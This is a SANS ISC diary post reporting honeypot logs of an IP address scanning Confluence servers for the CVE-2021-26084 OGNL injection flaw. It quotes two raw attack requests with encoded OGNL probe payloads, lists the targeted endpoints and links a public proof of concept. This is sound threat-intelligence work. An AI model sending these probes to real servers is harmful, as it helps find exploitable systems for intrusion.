Internet Wide Scan Fingerprinting Confluence Servers

Published: 2023-02-22
Last Updated: 2023-02-22 13:54:55 UTC
by Johannes Ullrich (Version: 1)
2 comment(s)

Looking over some of our honeypot logs today, I noticed one IP address, 60.223.74.99, scanning for several older Confluence vulnerabilities. confluence fingerprint icon

Confluence is the collaboration component of Atlassian's suite of developer tools [1]. Attacks against developers, and the tools they are using, are on the rise in general, and this is yet another "piece to the puzzle." A quick search using NIST's NVD shows 18 vulnerabilities in Confluence [2].

The scans use a known PoC exploit for CVE-2021-26084, an OGNL injection vulnerability[3].

Here are two sample requests sent by the attacker:

POST /users/user-dark-features HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57


queryString=aaaa%5Cu0027%2B%7B506%2A5210%7D%2B%5Cu0027bbb
 

POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

queryString=aaaa%5Cu0027%2B%7B3304%2A9626%7D%2B%5Cu0027bbb

 

All endpoints hit by the attacker:

/confluence/pages/createpage-entervariables.action
/confluence/pages/createpage-entervariables.action?SpaceKey=x
/pages/createpage.action?spaceKey=myproj
/pages/createpage-entervariables.action
/pages/createpage-entervariables.action?SpaceKey=x
/pages/doenterpagevariables.action
/pages/templates2/viewpagetemplate.action
/template/custom/content-editor
/templates/editor-preload-container
/users/user-dark-features
/wiki/pages/createpage-entervariables.action
/wiki/pages/createpage-entervariables.action?SpaceKey=x

The payload string decodes to:

aaaa'{506*5210}'bbb

The likely goal is to have the system return the result of the math problem to see if it is vulnerable to this attack.

No scans were seen from that source IP until today. It appears to be an otherwise unremarkable IP address allocated to what looks like a China Unicom consumer. It may be a CGNAT address used by China Unicom.

 

[1] https://www.atlassian.com/software/confluence
[2] https://nvd.nist.gov/vuln/search/results?form_type=Basic&results_type=overview&query=cpe%3A2.3%3Aa%3Aatlassian%3Aconfluence_data_center&search_type=all&isCpeNameSearch=false
[3] https://github.com/alt3kx/CVE-2021-26084_PoC

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

2 comment(s)
ISC Stormcast For Wednesday, February 22nd, 2023 https://isc.sans.edu/podcastdetail.html?id=8380

Comments


Diary Archives